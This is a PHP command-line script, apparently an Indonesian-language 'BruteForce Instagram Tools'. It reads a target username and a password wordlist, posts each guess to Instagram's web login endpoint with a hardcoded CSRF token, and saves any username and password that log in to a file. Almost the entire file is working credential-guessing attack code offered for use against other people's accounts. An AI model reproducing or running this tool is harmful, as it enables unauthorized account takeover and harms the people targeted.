<?php

function showProgressBar($percentage, int $numDecimalPlaces)
{
	$percentageStringLength = 4;
	if ($numDecimalPlaces > 0)
	{
		$percentageStringLength += ($numDecimalPlaces + 1);
	}

	$percentageString = number_format($percentage, $numDecimalPlaces) . '%';
	$percentageString = str_pad($percentageString, $percentageStringLength, " ", STR_PAD_LEFT);

    $percentageStringLength += 3; // add 2 for () and a space before bar starts.

    $terminalWidth = (int) `tput cols`;
    $barWidth = $terminalWidth - ($percentageStringLength) - 2; // subtract 2 for [] around bar
    $numBars = round(($percentage) / 100 * ($barWidth));
    $numEmptyBars = $barWidth - $numBars;

    $barsString = '[' . str_repeat("=", ($numBars)) . str_repeat(" ", ($numEmptyBars)) . ']';

    echo "($percentageString) " . $barsString . "\r";
}


function test($username,$password)
{
	// Generated by curl-to-PHP: http://incarnate.github.io/curl-to-php/
	$ch = curl_init();

	curl_setopt($ch, CURLOPT_URL, 'https://www.instagram.com/api/v1/web/accounts/login/ajax/');
	curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
	curl_setopt($ch, CURLOPT_POST, 1);
	curl_setopt($ch, CURLOPT_POSTFIELDS, "enc_password=%23PWD_INSTAGRAM_BROWSER%3A0%3A1636277221%3A$password&username=$username&queryParams=%7B%7D&optIntoOneTap=false&stopDeletionNonce=&trustedDeviceRecords=%7B%7D");

	$headers = array();
	$headers[] = 'X-CSRFToken: k5bj88omQ5ELsAJ1tauT8jh5fSvMJVID';
	curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
	$result = curl_exec($ch);
	curl_close($ch);
	$output = json_decode($result,true);
	if (preg_match("/userId|username/", $result))
	{
		$file = fopen('LogBruteForce.txt', 'a+') or die ("gabisa di buka bosque !");
		$isi  = $username." ".$password."\n";
		fwrite($file, $isi);
		fclose($file);
		echo "\n\n\nPassword Di Temukan\n\n";
		echo "Username : $username\n";
		echo "Password : $password\n";
		$loop = 2;
	}
}


echo "
_________ _______ _________ _______  _______  _______
|\     /|\__   __/(       )\__   __/(  ____ \(  ____ \(  ____ \
| )   ( |   ) (   | () () |   ) (   | (    \/| (    \/| (    \/
| | _ | |   | |   | || || |   | |   | (_____ | (__    | |
| |( )| |   | |   | |(_)| |   | |   (_____  )|  __)   | |
| || || |   | |   | |   | |   | |         ) || (      | |
| () () |___) (___| )   ( |___) (___/\____) || (____/\| (____/\
(_______)\_______/|/     \|\_______/\_______)(_______/(_______/

\n";
echo "BruteForce Instagram Tools\nCreted By MasTenWap\n\n";
echo "Masukan Username Target : ";
$username = trim(fgets(STDIN));
echo "Masukan Wordlist : ";
$wordlist = trim(fgets(STDIN));
$handle = fopen("$wordlist.txt", "rw");
$loop = 1 ;
if ($handle and $loop <= 1) {
	while (($line = fgets($handle)) !== false)
	{
		$pw = trim($line);
		test($username,$pw);
	}

	fclose($handle);
} else {

}
$total=1000*5;
for ($i=0; $i<$total; $i++)
{
	$percentage = $i / $total * 100;
	showProgressBar($percentage, 2);
}
print PHP_EOL;
?>
